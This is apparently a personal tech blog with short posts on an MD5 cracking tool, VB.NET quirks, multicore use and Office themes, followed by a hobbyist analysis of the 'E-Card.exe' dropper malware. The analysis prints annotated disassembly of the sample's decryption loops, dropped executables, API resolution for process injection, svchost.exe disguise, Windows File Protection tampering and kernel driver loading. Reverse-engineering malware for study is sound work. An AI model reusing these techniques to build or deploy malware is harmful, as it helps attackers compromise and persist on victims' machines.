Worlds fastest MD5 cracker

Most of the time when I get some MD5 hashes to crack (legally!), I prefer to search online hash sites which hosts lot of hashes and corresponding text. But sometimes it wont just work. So the only alternative is to crack the hashes by our own methods and tools. I use different MD5 crackers and even coded one for specific uses I found a new tool which claims to be the fastest MD5 cracker in the world. It is called BarsWF. It offers the use of multiple CPUs(if you have them) and it also uses the Graphics card (it supports both nVidia and ATi) if avail.
Use of graphics cards in computationally intense tasks are not new, but seeing a freeware that efficiently uses the computing power of GPU makes me happy :). I don't have a decent GPU to check the performance, but I am pretty sure it uses GPU efficiently. BarsWF is available for both nVidia and ATi chipsets. For ATi it still uses the old Brook technology, so it may not support latest HD 5xxx cards. Hope that author will move to OpenCL and we will have much faster MD5 cracker.

VB.NET anomalies!

I have been always a strong follower of C based languages. I work with C, C++, C# for 90% of my time. In these days, I was told to look after some VB.NET code and found 2 anomalies which made me a little crazy for the first time. May be most of the VB.NET guys knows this, but it was pretty new to me( and yeah, I was baffled after I figured out the solution).

First scenario:

<br /> bool statusDoor = true ;<br /> bool statusWindow = true ;<br /><br /> statusDoor = statusWindow = false;<br /><br /> if (statusDoor)<br /> MessageBox.Show("Door is enabled");<br /> if (statusWindow)<br /> MessageBox.Show("Window is enabled");<br />

Most of us use these kinda code quite often. This works great with C and C#, but lets see if it works with VB.NET

<br /> Dim statusDoor As Boolean = True<br /> Dim statusWindow As Boolean = True<br /><br /> statusDoor = statusWindow = False<br /><br /> If (statusDoor) Then<br /> MessageBox.Show("Door is enabled")<br /> End If<br /> If (statusWindow) Then<br /> MessageBox.Show("Window is enabled")<br /> End If<br />
Well, I am not telling you the output, you can just check with VS IDE.
But beware of the usage, they wont work in VB.NET :P

Second scenario:
For this one we require a little math skill :)
<br /> int num = 20;<br /> int divider = 7;<br /> int result = 0;<br /><br /> result = num / divider;<br /><br /> MessageBox.Show(result.ToString());<br />

You can guess the output, it is 2. We will look into VB.NET code.
<br /> Dim num As Integer = 20<br /> Dim divider As Integer = 7<br /> Dim result As Integer = 0<br /><br /> result = num / divider<br /> MessageBox.Show(result.ToString())<br />

If you think the output is 2, you are very wrong!
It is 3 for VB.NET. You will be thinking, how on earth? (at least I thought for first time).

Well, in C and C# when casting from floating point output to integer it "floors" the value.
In VB.NET, it uses another technique known as banker's rounding.

In most cases you can detect it pretty early in coding a routine, but this makes a big mess when you are converting a 3000 line equation solving C/C# code into VB.NET and finally what you see is some random values as output.

I don't like to do much coding in VB.NET. Maybe I am more inclined to C based syntax and maybe my mind always tells me to put semi column after each line of code. Maybe it is just my ignorance about the VB.NET language that made these errors and I suppose most of the VB.NET coders do know about these "anomalies" .

Multi Processor and Execution Speed

I was browsing, and saw a video converter. Just for a curiosity, I downloaded it and tried for couple of times. It worked perfectly, but I was kinda thinking whether the speed is a little slow for a Dual core processor like x2 5600 :P. So I fired up the Task Manger. It shows a 50% CPU usage, while the program says that it will use 100% CPU(There is a settings for that).


Well, the problem is with the code. Seems like most of the small scale softwares are not MP aware. It should have been better if softwares like these ones (which uses a lot of computational time) uses the Multi Core correctly, the whole time spent to convert can be minimized to half(almost!).

As new processors are coming with 4 and 8 cores, it will be great if the softwares are MP aware, and use the processing power to the MAX!

Office 2007 Theme

I haven't written anything for a long time!
Well, I was pretty busy with my work, so not much time to spend on blog.
This topic is regarding the Office 2007 Theme. I was getting bored of the blue color (theme) of Office 2007 in my office and I want a change :). I looked around to find an option but I can’t find any!
Seems like the new Menu structure (Ribbon) has made me confused. So I started to search the menu from top to bottom. After a couple of minutes I found the option button.

And we have three themes to select.

And the themes looks like this:

Black looks promising. Silver is too flashy!
Changed to black until i get bored again!

Mouse at it's 40's

We have been using mouse for a long time. Mouse was introduced by Douglas Engelbart in 1968 DEC 1(I hope my memories are correct :P). After that it has been a major input device which has evolved in many forms, technologies (like optical, wireless...). Lets see how was the first mouse looks like:

Amazing invention ;)

Gmail Password Stealing Attempt!

I got a mail recently demanding my user name, password and other information in my gmail account from a mail address MAIL ACCOUNT (accountreplypass.account@gmail.com)
It is a nice piece of joke done by some one. Please beware of these kinda craps.

Analysis of malware: E-Card.exe

[Disclaimer]:
I am not a professional malware analyst(It is not my job, i am more of a C# developer working on domains like banking :P). I like to Reverse Engineer malwares, and it is my hobby. Some of the contents may not be perfectly correct.

I got this file some times back. Lets see what it contains :)

Initial Analysis
-----------------

File: E-Card.exe
MD5: B2308378D0311478EFC5AC0D87F51F5D
File Size: 238,592 bytes
File is compiled in Delphi. EP looks like that, and no sign of packing :)

Tracing through the code
-------------------------

Tracing through the initial instructions will show u these piece of interesting codes.

<br />00401F75 > \BA 00FE0200 MOV EDX, 2FE00<br />00401F7A . B8 9C304000 MOV EAX, 40309C<br />00401F7F > /8A08 /MOV CL, BYTE PTR DS:[EAX]<br />00401F81 . 320E XOR CL, BYTE PTR DS:[ESI]<br />00401F83 . 32CB XOR CL, BL<br />00401F85 . 8808 MOV BYTE PTR DS:[EAX], CL<br />00401F87 . 80FB FF CMP BL, 0FF<br />00401F8A . 75 04 JNZ SHORT 00401F90 ; e-card.00401F90<br />00401F8C . B3 01 MOV BL, 1<br />00401F8E . EB 01 JMP SHORT 00401F91 ; e-card.00401F91<br />00401F90 > 43 INC EBX<br />00401F91 > 40 INC EAX<br />00401F92 . 4A DEC EDX<br />00401F93 .^\75 EA \JNZ SHORT 00401F7F ; e-card.00401F7F<br /><br /><br />00401FBD > \BA 006C0000 MOV EDX, 6C00<br />00401FC2 . B8 A02E4300 MOV EAX, 432EA0<br />00401FC7 > 8A08 /MOV CL, BYTE PTR DS:[EAX]<br />00401FC9 . 320E XOR CL, BYTE PTR DS:[ESI]<br />00401FCB . 32CB XOR CL, BL<br />00401FCD . 8808 MOV BYTE PTR DS:[EAX], CL<br />00401FCF . 80FB FF CMP BL, 0FF<br />00401FD2 . 75 04 JNZ SHORT 00401FD8 ; e-card.00401FD8<br />00401FD4 . B3 01 MOV BL, 1<br />00401FD6 . EB 01 JMP SHORT 00401FD9 ; e-card.00401FD9<br />00401FD8 > 43 INC EBX<br />00401FD9 > 40 INC EAX<br />00401FDA . 4A DEC EDX<br />00401FDB .^ 75 EA \JNZ SHORT 00401FC7 ; e-card.00401FC7<br />

It is decrypting a lot of memory. There are 2 loops and after the two loops we can see 2 MZ headers.
That means, we have 2 other exe's inside our main exe
These 2 exe's are written to temp folder with name scan.exe and finder.exe

Stack SS:[0012FFAC]=00153D38, (ASCII "C:\DOCUME~1\Username\LOCALS~1\Temp\scan.exe")
EDX=00153D58, (ASCII "scan.exe")
e-card.moduleentrypoint+10D

Stack SS:[0012FFA8]=00153D78, (ASCII "C:\DOCUME~1\Username\LOCALS~1\Temp\finder.exe")
EDX=00153D98, (ASCII "finder.exe")
e-card.moduleentrypoint+169

<br />004020CB . 50 PUSH EAX ; FileName = "C:\DOCUME~1\Username\LOCALS~1\Temp\scan.exe"<br />004020CC . 68 40214000 PUSH 402140 ; Operation = "open"<br />004020D1 . 6A 00 PUSH 0 ; hWnd = NULL<br />004020D3 . E8 7CFDFFFF CALL 00401E54 ; \ShellExecuteA<br /><br />00402109 . 50 PUSH EAX ; FileName = "C:\DOCUME~1\Username\LOCALS~1\Temp\finder.exe"<br />0040210A . 68 40214000 PUSH 402140 ; Operation = "open"<br />0040210F . 6A 00 PUSH 0 ; hWnd = NULL<br />00402111 . E8 3EFDFFFF CALL 00401E54 ; \ShellExecuteA<br />


Then these two exes are run from there. I just cut em from there to some other place for the rest of the analysis.
So our main exe (E-Card.exe) acts as a dropper :)

Analysis of 2 new exe's
-----------------------

File: scan.exe
MD5: 07B1A1F3C0F9C7E1009F94835B5C8D59
File Size: 196,096 bytes

File: finder.exe
MD5: 565DEA79362D55D53D8441320D450093
File Size: 27,648 bytes

Aah, we have the .pack32 section in scan.exe
Does this means the same packing as the earlier one(paris Hilton)?
Is it also made by Antivirus-Xp 2008 guys?
Lets see!

Damn! its the same guys, same kinda code, but i think it is new, coz OEP isnt the same :P

So no use in debugging the same stuff. Lets see whats the new exe doing :)

It seems like it has been compressed by UPX, but it is not!
Lets step through the instructions.

<br />04021FB 8B3D 2A114000 MOV EDI, DWORD PTR DS:[40112A] ; kernel32.ExitProcess<br />00402201 66:81E7 0010 AND DI, 1000<br />00402206 68 58224000 PUSH 402258<br />0040220B 64:FF35 0000000>PUSH DWORD PTR FS:[0]<br />00402212 64:8925 0000000>MOV DWORD PTR FS:[0], ESP<br />00402219 8925 C0454000 MOV DWORD PTR DS:[4045C0], ESP<br />0040221F 892D C4454000 MOV DWORD PTR DS:[4045C4], EBP<br />00402225 893D C8454000 MOV DWORD PTR DS:[4045C8], EDI<br />0040222B 66:813F 4D5A CMP WORD PTR DS:[EDI], 5A4D ;Checking for MZ<br />00402230 75 1E JNZ SHORT 00402250 ; finder.00402250<br />00402232 8B47 3C MOV EAX, DWORD PTR DS:[EDI+3C]<br />00402235 89FE MOV ESI, EDI<br />00402237 01C7 ADD EDI, EAX<br />00402239 66:813F 5045 CMP WORD PTR DS:[EDI], 4550 ;Checking for PE<br />0040223E 75 10 JNZ SHORT 00402250 ; finder.00402250<br />00402240 89F0 MOV EAX, ESI<br />00402242 FF3424 PUSH DWORD PTR SS:[ESP]<br />00402245 64:8F05 0000000>POP DWORD PTR FS:[0]<br />0040224C 83C4 08 ADD ESP, 8<br />0040224F C3 RETN<br />00402250 81EF 00100000 SUB EDI, 1000<br />00402256 ^ EB C1 JMP SHORT 00402219 ; finder.00402219<br />

It looks like, it is trying to get the base address of kernel32, by subtracting 0x1000 and checking for "MZ"
After getting base address of kernel32, it will surely want to find some main addresses like, addresses of GetProcAddress() and LoadLibrary()

GetProcAddress is found out by going through export table:
<br />GetProcAddress is found out by going through export table:<br /><br />00402271 803E 00 CMP BYTE PTR DS:[ESI], 0<br />00402274 74 0A JE SHORT 00402280 ; finder.00402280<br />00402276 A6 CMPS BYTE PTR DS:[ESI], BYTE PTR ES:[EDI] ;Compare the export table entries<br />00402277 ^ 74 F8 JE SHORT 00402271 ; finder.00402271<br />00402279 AE SCAS BYTE PTR ES:[EDI]<br />0040227A ^ 75 FD JNZ SHORT 00402279 ; finder.00402279<br />0040227C 5E POP ESI<br />0040227D 42 INC EDX<br />0040227E ^ EB F0 JMP SHORT 00402270 ; finder.00402270<br />00402280 5E POP ESI<br />00402281 89D0 MOV EAX, EDX<br />00402283 C3 RETN<br /><br />004022AC E8 BBFFFFFF CALL 0040226C ; Find Export Table entry<br />004022B1 8B55 24 MOV EDX, DWORD PTR SS:[EBP+24]<br />004022B4 01DA ADD EDX, EBX<br />004022B6 8B4D 10 MOV ECX, DWORD PTR SS:[EBP+10]<br />004022B9 8D4442 02 LEA EAX, DWORD PTR DS:[EDX+EAX*2+2]<br />004022BD 8D0C09 LEA ECX, DWORD PTR DS:[ECX+ECX]<br />004022C0 29C8 SUB EAX, ECX<br />004022C2 66:8B00 MOV AX, WORD PTR DS:[EAX]<br />004022C5 25 FFFF0000 AND EAX, 0FFFF<br />004022CA 8B55 1C MOV EDX, DWORD PTR SS:[EBP+1C]<br />004022CD 01DA ADD EDX, EBX<br />004022CF 8B0482 MOV EAX, DWORD PTR DS:[EDX+EAX*4]<br />004022D2 01D8 ADD EAX, EBX ;Do the calculations to find k32.GetProcAddress<br /><br />Now it will try to get some important APIs :<br /><br />0040238F . 68 48304000 PUSH 403048 ; /ProcNameOrOrdinal = "GetCurrentThread"<br />00402394 . FF35 F0304000 PUSH DWORD PTR DS:[4030F0] ; hModule = 7C800000 (kernel32)<br />0040239A . FF15 EC304000 CALL NEAR DWORD PTR DS:[4030EC] ; \GetProcAddress<br />004023A0 . A3 FC304000 MOV DWORD PTR DS:[4030FC], EAX<br />004023A5 . C605 3B304000>MOV BYTE PTR DS:[40303B], 4C<br />004023AC . EB 00 JMP SHORT 004023AE ; finder.004023AE<br />004023AE > 68 70304000 PUSH 403070 ; /ProcNameOrOrdinal = "GetModuleHandleA"<br />004023B3 . FF35 F0304000 PUSH DWORD PTR DS:[4030F0] ; hModule = 7C800000 (kernel32)<br />004023B9 . FF15 EC304000 CALL NEAR DWORD PTR DS:[4030EC] ; \GetProcAddress<br />004023BF . A3 F4304000 MOV DWORD PTR DS:[4030F4], EAX<br />004023C4 . 68 3B304000 PUSH 40303B ; /ProcNameOrOrdinal = "LoadLibraryA"<br />004023C9 . FF35 F0304000 PUSH DWORD PTR DS:[4030F0] ; hModule = 7C800000 (kernel32)<br />004023CF . FF15 EC304000 CALL NEAR DWORD PTR DS:[4030EC] ; \GetProcAddress<br />004023D5 . A3 00314000 MOV DWORD PTR DS:[403100], EAX<br />004023DA . EB 01 JMP SHORT 004023DD ; finder.004023DD<br />004023DC 00 DB 00<br />004023DD > 68 2E304000 PUSH 40302E ; /ProcNameOrOrdinal = "CreateThread"<br />004023E2 . FF35 F0304000 PUSH DWORD PTR DS:[4030F0] ; hModule = 7C800000 (kernel32)<br />004023E8 . FF15 EC304000 CALL NEAR DWORD PTR DS:[4030EC] ; \GetProcAddress<br /><br /><br />Now some NT functions from NTDLL<br /><br />004023F6 > \68 81304000 PUSH 403081 ; /FileName = "ntdll.dll"<br />004023FB . FF15 00314000 CALL NEAR DWORD PTR DS:[403100] ; \LoadLibraryA<br />00402401 . 85C0 TEST EAX, EAX<br />00402403 . 74 02 JE SHORT 00402407 ; finder.00402407<br />00402405 . EB 08 JMP SHORT 0040240F ; finder.0040240F<br />00402407 > 31C0 XOR EAX, EAX<br />00402409 . 40 INC EAX<br />0040240A . A3 316A4000 MOV DWORD PTR DS:[406A31], EAX<br />0040240F > EB 00 JMP SHORT 00402411 ; finder.00402411<br />00402411 > 68 59304000 PUSH 403059 ; /ProcNameOrOrdinal = "NtSetInformationThread"<br />00402416 . 50 PUSH EAX ; hModule<br />00402417 . FF15 EC304000 CALL NEAR DWORD PTR DS:[4030EC] ; \GetProcAddress<br /><br />Now it makes a window with class name NOTEPAD.exe <br /><br />00402430 . 6A 00 PUSH 0 ; /pModule = NULL<br />00402432 . FF15 F4304000 CALL NEAR DWORD PTR DS:[4030F4] ; \GetModuleHandleA<br />00402438 . A3 A8304000 MOV DWORD PTR DS:[4030A8], EAX<br />0040243D . EB 01 JMP SHORT 00402440 ; finder.00402440<br />0040243F . FC CLD<br />00402440 > 68 007F0000 PUSH 7F00 ; /RsrcName = IDI_APPLICATION<br />00402445 . 6A 00 PUSH 0 ; hInst = NULL<br />00402447 . FF15 7E104000 CALL NEAR DWORD PTR DS:[40107E] ; \LoadIconA<br />0040244D . A3 AC304000 MOV DWORD PTR DS:[4030AC], EAX<br />00402452 . 68 007F0000 PUSH 7F00 ; /RsrcName = IDC_ARROW<br />00402457 . 6A 00 PUSH 0 ; hInst = NULL<br />00402459 . FF15 82104000 CALL NEAR DWORD PTR DS:[401082] ; \LoadCursorA<br />0040245F . A3 B0304000 MOV DWORD PTR DS:[4030B0], EAX<br />00402464 . 68 98304000 PUSH 403098 ; /pWndClass = finder.00403098<br />00402469 . FF15 86104000 CALL NEAR DWORD PTR DS:[401086] ; \RegisterClassA<br />0040246F . 6A 00 PUSH 0 ; /lParam = NULL<br />00402471 . FF35 A8304000 PUSH DWORD PTR DS:[4030A8] ; hInst = 00400000<br />00402477 . 6A 00 PUSH 0 ; hMenu = NULL<br />00402479 . 6A 00 PUSH 0 ; hParent = NULL<br />0040247B . 68 C0000000 PUSH 0C0 ; Height = C0 (192.)<br />00402480 . 68 00010000 PUSH 100 ; Width = 100 (256.)<br />00402485 . 68 18FCFFFF PUSH -3E8 ; Y = FFFFFC18 (-1000.)<br />0040248A . 68 18FCFFFF PUSH -3E8 ; X = FFFFFC18 (-1000.)<br />0040248F . 68 00004800 PUSH 480000 ; Style = WS_OVERLAPPEDWS_SYSMENUWS_DLGFRAME<br />00402494 . 68 05304000 PUSH 403005 ; WindowName = "Enter text here..."<br />00402499 . 68 18304000 PUSH 403018 ; Class = "NOTEPAD.EXE"<br />0040249E . 6A 00 PUSH 0 ; ExtStyle = 0<br />004024A0 . FF15 7A104000 CALL NEAR DWORD PTR DS:[40107A] ; \CreateWindowExA<br /><br />WndProc starts at:<br />004024D4 >/. 55 PUSH EBP<br />004024D5 . 89E5 MOV EBP, ESP<br />004024D7 . 83EC 04 SUB ESP, 4<br />004024DA . 53 PUSH EBX<br />004024DB . 56 PUSH ESI<br />004024DC . 57 PUSH EDI<br />004024DD . 837D 0C 01 CMP [ARG.2], 1<br />004024E1 . 74 14 JE SHORT 004024F7 ; finder.004024F7<br />004024E3 . FF75 14 PUSH [ARG.4] ; /lParam<br />004024E6 . FF75 10 PUSH [ARG.3] ; wParam<br />004024E9 . FF75 0C PUSH [ARG.2] ; Message<br />004024EC . FF75 08 PUSH [ARG.1] ; hWnd<br />004024EF . FF15 92104000 CALL NEAR DWORD PTR DS:[401092] ; \DefWindowProcA<br />004024F5 . EB 19 JMP SHORT 00402510 ; finder.00402510<br />004024F7 > 8D4D FC LEA ECX, [LOCAL.1]<br />004024FA . 51 PUSH ECX ; /pThreadId<br />004024FB . 6A 00 PUSH 0 ; CreationFlags = 0<br />004024FD . 6A 00 PUSH 0 ; pThreadParm = NULL<br />004024FF . 68 17254000 PUSH 402517 ; ThreadFunction = finder.00402517<br />00402504 . 6A 00 PUSH 0 ; StackSize = 0<br />00402506 . 6A 00 PUSH 0 ; pSecurity = NULL<br />00402508 . FF15 F8304000 CALL NEAR DWORD PTR DS:[4030F8] ; \CreateThread<br />0040250E . 31C0 XOR EAX, EAX<br />00402510 > 5F POP EDI<br />00402511 . 5E POP ESI<br />00402512 . 5B POP EBX<br />00402513 . C9 LEAVE<br />00402514 \. C2 1000 RETN 10<br />

Yea! Now it is making a Thread with thread proc at 00402517.
It jumps to 00403000 then jumps to 00403104, where it will decrypt the rest of the code:
<br />00403104 BF 18314000 MOV EDI, 403118 ; ASCII "hûD@"<br />00403109 B9 13390000 MOV ECX, 3913<br />0040310E 2807 SUB BYTE PTR DS:[EDI], AL<br />00403110 3007 XOR BYTE PTR DS:[EDI], AL<br />00403112 47 INC EDI<br />00403113 ^ E2 F9 LOOPD SHORT 0040310E ; finder.0040310E<br /><br />Yep, after it decrypts 0x3913 bytes, it looks like we have more codes to deal ;)<br />Next it will load k32, and tries to build a list of APIs that will be used eventually.<br /><br />00403A7E >/$ 57 /PUSH EDI ; /ProcNameOrOrdinal<br />00403A7F . 53 PUSH EBX ; hModule<br />00403A80 . FF15 EC304000 CALL NEAR DWORD PTR DS:[4030EC] ; \GetProcAddress<br />00403A86 . 8906 MOV DWORD PTR DS:[ESI], EAX<br />00403A88 . 31C0 XOR EAX, EAX<br />00403A8A . 31C9 XOR ECX, ECX<br />00403A8C . 49 DEC ECX<br />00403A8D . F2:AE REPNE SCAS BYTE PTR ES:[EDI]<br />00403A8F . 83C6 04 ADD ESI, 4<br />00403A92 . 803F 00 CMP BYTE PTR DS:[EDI], 0<br />00403A95 .^ 75 E7 \JNZ SHORT 00403A7E ; finder.GetProcAddr<br />00403A97 \. C3 RETN<br /><br />

Seems like a lot of APIs :P
<br /><br />00404A74 7C80CCA9 kernel32.ExitThread<br />00404A78 7C80B929 kernel32.lstrcmpiA<br />00404A7C 7C812C8D kernel32.GetCommandLineA<br />00404A80 7C86114D kernel32.WinExec<br />00404A84 7C860A55 kernel32.GetProcessId<br />00404A88 7C80AA49 kernel32.GetProcessHeap<br />00404A8C 7C81367C kernel32.GetFullPathNameA<br />00404A90 7C838FB9 kernel32.lstrcatA<br />00404A94 7C80C6E0 kernel32.lstrlenA<br />00404A98 7C80C729 kernel32.lstrcpyA<br />00404A9C 7C810311 kernel32.lstrcpynA<br />00404AA0 7C809A39 kernel32.lstrlenW<br />00404AA4 7C910331 ntdll.RtlGetLastWin32Error<br />00404AA8 7C814C63 kernel32.GetSystemDirectoryA<br />00404AAC 7C82293B kernel32.GetWindowsDirectoryA<br />00404AB0 7C8227C7 kernel32.ExpandEnvironmentStringsA<br />00404AB4 7C830053 kernel32.CopyFileA<br />00404AB8 7C809CAD kernel32.MultiByteToWideChar<br />00404ABC 7C8221CF kernel32.GetTempPathA<br />00404AC0 7C8606DF kernel32.GetTempFileNameA<br />00404AC4 7C81E85C kernel32.DeleteFileA<br />00404AC8 7C802367 kernel32.CreateProcessA<br />00404ACC 7C801A24 kernel32.CreateFileA<br />00404AD0 7C80946C kernel32.CreateFileMappingA<br />00404AD4 7C80B78D kernel32.MapViewOfFile<br />00404AD8 7C809B77 kernel32.CloseHandle<br />00404ADC 7C80B7FC kernel32.UnmapViewOfFile<br />00404AE0 7C80220F kernel32.WriteProcessMemory<br />00404AE4 7C81E92A kernel32.ResumeThread<br />00404AE8 7C809AA2 kernel32.VirtualAllocEx<br />00404AEC 7C809B32 kernel32.VirtualFreeEx<br />00404AF0 7C9105D4 ntdll.RtlAllocateHeap<br />00404AF4 7C810F9F kernel32.WriteFile<br />00404AF8 7C91043D ntdll.RtlFreeHeap<br />00404AFC 7C81FB44 kernel32.SetFileAttributesA<br />00404B00 7C81E079 kernel32.OpenProcess<br />00404B04 7C810626 kernel32.CreateRemoteThread<br />00404B08 7C8647B7 kernel32.CreateToolhelp32Snapshot<br />00404B0C 7C863A8D kernel32.Process32First<br />00404B10 7C863C00 kernel32.Process32Next<br />00404B14 7C80B929 kernel32.lstrcmpiA<br />00404B18 7C80B357 kernel32.GetModuleFileNameA<br />00404B1C 7C802442 kernel32.Sleep<br />00404B20 7C8092AC kernel32.GetTickCount<br />00404B24 7C859B5C kernel32.OutputDebugStringA<br />00404B28 7C801A5D kernel32.VirtualProtectEx<br />00404B2C 7C863ED8 kernel32.Module32First<br />00404B30 7C86405D kernel32.Module32Next<br />00404B34 7C80B828 kernel32.VirtualQueryEx<br />00404B38 7C8021CC kernel32.ReadProcessMemory<br />00404B3C 7C801E16 kernel32.TerminateProcess<br />00404B40 7C80CC26 kernel32.GetThreadPriority<br />00404B44 7C80994E kernel32.GetCurrentProcessId<br />00404B48 7C80CC67 kernel32.SetThreadPriority<br />00404B4C 7C801D4F kernel32.LoadLibraryExA<br />00404B50 7C81486A kernel32.GetEnvironmentVariableA<br />00404B54 7C826219 kernel32.CreateDirectoryA

Now code is looking good, like this:
<br />00403151 . 68 88130000 PUSH 1388 ; /BufSize = 1388 (5000.)<br />00403156 . 50 PUSH EAX ; Buffer<br />00403157 . 68 9E454000 PUSH 40459E ; VarName = "ProgramFiles"<br />0040315C . FF15 504B4000 CALL NEAR DWORD PTR DS:[404B50] ; \GetEnvironmentVariableA<br />00403162 . 85C0 TEST EAX, EAX<br />00403164 . 75 11 JNZ SHORT 00403177 ; finder.00403177<br />00403166 . 68 AB454000 PUSH 4045AB ; /String2 = "c:\Program Files"<br />0040316B . FF35 D8454000 PUSH DWORD PTR DS:[4045D8] ; String1 = NULL<br />00403171 . FF15 984A4000 CALL NEAR DWORD PTR DS:[404A98] ; \lstrcpyA<br />00403177 > 68 5B454000 PUSH 40455B ; /StringToAdd = "\Microsoft Common"<br />0040317C . FF35 D8454000 PUSH DWORD PTR DS:[4045D8] ; ConcatString = NULL<br />00403182 . FF15 904A4000 CALL NEAR DWORD PTR DS:[404A90] ; \lstrcatA<br />00403188 . 6A 00 PUSH 0 ; /pSecurity = NULL<br />0040318A . FF35 D8454000 PUSH DWORD PTR DS:[4045D8] ; Path = NULL<br />00403190 . FF15 544B4000 CALL NEAR DWORD PTR DS:[404B54] ; \CreateDirectoryA<br />00403196 . 68 6D454000 PUSH 40456D ; /StringToAdd = "\svchost.exe"<br />0040319B . FF35 D8454000 PUSH DWORD PTR DS:[4045D8] ; ConcatString = NULL<br />004031A1 . FF15 904A4000 CALL NEAR DWORD PTR DS:[404A90] ; \lstrcatA<br />004031A7 . E8 9E080000 CALL 00403A4A ; finder.00403A4A<br />004031AC . 85C0 TEST EAX, EAX<br />004031AE . 0F84 77380000 JE 00406A2B ; finder.00406A2B<br />004031B4 . A3 DC454000 MOV DWORD PTR DS:[4045DC], EAX<br />004031B9 . 68 88130000 PUSH 1388 ; /BufSize = 1388 (5000.)<br />004031BE . 50 PUSH EAX ; PathBuffer<br />004031BF . 6A 00 PUSH 0 ; hModule = NULL<br />004031C1 . FF15 184B4000 CALL NEAR DWORD PTR DS:[404B18] ; \GetModuleFileNameA<br />004031C7 . 6A 00 PUSH 0 ; /FailIfExists = FALSE<br />004031C9 . FF35 D8454000 PUSH DWORD PTR DS:[4045D8] ; NewFileName = NULL<br />004031CF . FF35 DC454000 PUSH DWORD PTR DS:[4045DC] ; ExistingFileName = NULL<br />004031D5 . FF15 B44A4000 CALL NEAR DWORD PTR DS:[404AB4] ; \CopyFileA<br />004031DB . 68 20454000 PUSH 404520 ; /FileName = "ntdll.dll"<br />004031E0 . FF15 00314000 CALL NEAR DWORD PTR DS:[403100] ; \LoadLibraryA<br />004031E6 . 89C3 MOV EBX, EAX<br />004031E8 . BF 004D4000 MOV EDI, 404D00 ; ASCII "NtSetInformationThread"<br />004031ED . BE 694D4000 MOV ESI, 404D69 ; ASCII "ØnB" 004031F2 . E8 87080000 CALL 00403A7E ; finder.getprocaddr<br />004031F7 . 68 13454000 PUSH 404513 ; /FileName = "advapi32.dll"<br />004031FC . FF15 00314000 CALL NEAR DWORD PTR DS:[403100] ; \LoadLibraryA<br />00403202 . 89C3 MOV EBX, EAX<br />00403204 . BF 584B4000 MOV EDI, 404B58 ; ASCII "RegDeleteKeyA"<br />00403209 . BE 564C4000 MOV ESI, 404C56<br />0040320E . E8 6B080000 CALL 00403A7E ; finder.getprocaddr<br />00403213 . 68 2A454000 PUSH 40452A ; /FileName = "shlwapi.dll"<br />00403218 . FF15 00314000 CALL NEAR DWORD PTR DS:[403100] ; \LoadLibraryA<br />0040321E . 89C3 MOV EBX, EAX<br />00403220 . BF 964C4000 MOV EDI, 404C96 ; ASCII "StrCmpNIA"<br />00403225 . BE B54C4000 MOV ESI, 404CB5<br />0040322A . E8 4F080000 CALL 00403A7E ; finder.getprocaddr<br />0040322F . 68 36454000 PUSH 404536 ; /FileName = "gdi32.dll"<br />00403234 . FF15 00314000 CALL NEAR DWORD PTR DS:[403100] ; \LoadLibraryA<br />0040323A . 89C3 MOV EBX, EAX<br />0040323C . BF C14C4000 MOV EDI, 404CC1 ; ASCII "CreatePalette"<br />00403241 . BE F44C4000 MOV ESI, 404CF4<br />00403246 . E8 33080000 CALL 00403A7E ; finder.getprocaddr<br />0040324B . 68 08454000 PUSH 404508 ; /FileName = "urlmon.dll"<br />00403250 . FF15 00314000 CALL NEAR DWORD PTR DS:[403100] ; \LoadLibraryA<br />00403256 . 89C3 MOV EBX, EAX<br />00403258 . BF 854D4000 MOV EDI, 404D85 ; ASCII "URLDownloadToFileA"<br />0040325D . BE 994D4000 MOV ESI, 404D99<br />00403262 . E8 17080000 CALL 00403A7E ; finder.getprocaddr<br />00403267 . 68 20454000 PUSH 404520 ; /FileName = "ntdll.dll"<br />0040326C . FF15 00314000 CALL NEAR DWORD PTR DS:[403100] ; \LoadLibraryA<br />00403272 . 85C0 TEST EAX, EAX<br />00403274 . 0F84 D10E0000 JE 0040414B ; finder.0040414B<br />0040327A . 68 004D4000 PUSH 404D00 ; /ProcNameOrOrdinal = "NtSetInformationThread"<br />0040327F . 50 PUSH EAX ; hModule<br />00403280 . FF15 EC304000 CALL NEAR DWORD PTR DS:[4030EC] ; \GetProcAddress<br />

It will make a directory in the program files, named: "Program Files\Microsoft Common"

Then it will copy the base exe(finder.exe) to this folder with a new name "svchost.exe"

After loading more dlls to memory, and getting more APIs, it calls another function: 00403C61

In that it is loading sfc_os.dll, which is used by the "Windows File Protection"
Lets see what it wants with WFP
<br />00403CA4 . 68 F0444000 PUSH 4044F0 ; /FileName = "sfc_os.dll"<br />00403CA9 . FF15 00314000 CALL NEAR DWORD PTR DS:[403100] ; \LoadLibraryA<br />00403CAF . 6A 05 PUSH 5 ; /ProcNameOrOrdinal = #5<br />00403CB1 . 50 PUSH EAX ; hModule<br />00403CB2 . FF15 EC304000 CALL NEAR DWORD PTR DS:[4030EC] ; \GetProcAddress<br />


Now it is becoming interesting!
Call to 00403572, shows that it is gonna make some big changes to the system directory.
It finds the exact version of windows and makes the NTOSKRNL file name.
It loads "ntkrnlpa.exe" (mine is win xp sp2) to memory. It also loads ntdll.

Bingo!

We have some Ring0 stuffs too???

Looks like it wants our KeServiceDescriptorTable :)
<br />004037BD . 68 85454000 PUSH 404585 ; /ProcNameOrOrdinal = "KeServiceDescriptorTable"<br />004037C2 . FF75 08 PUSH [ARG.1] ; hModule<br />004037C5 . FF15 EC304000 CALL NEAR DWORD PTR DS:[4030EC] ; \GetProcAddress<br />

The rest of the things continues and many NT* APIs are loaded.
There was an exception, but i didnt bother to go back for further analysis.
Hopefully i had made a BP on NTDLL, where it calls the Exception handler function.
It safely land to the code, and next thing is we will make a file in "temp", named "rdl5.tmp".

I looked at it wil PEID, Subsytem is NIL and import tables contains export from "ntoskrnl" with NT* and ZW* APIs.
Looks surely like a device driver (sys) file :)

Yep, further calls reveals that, this file may used in services.
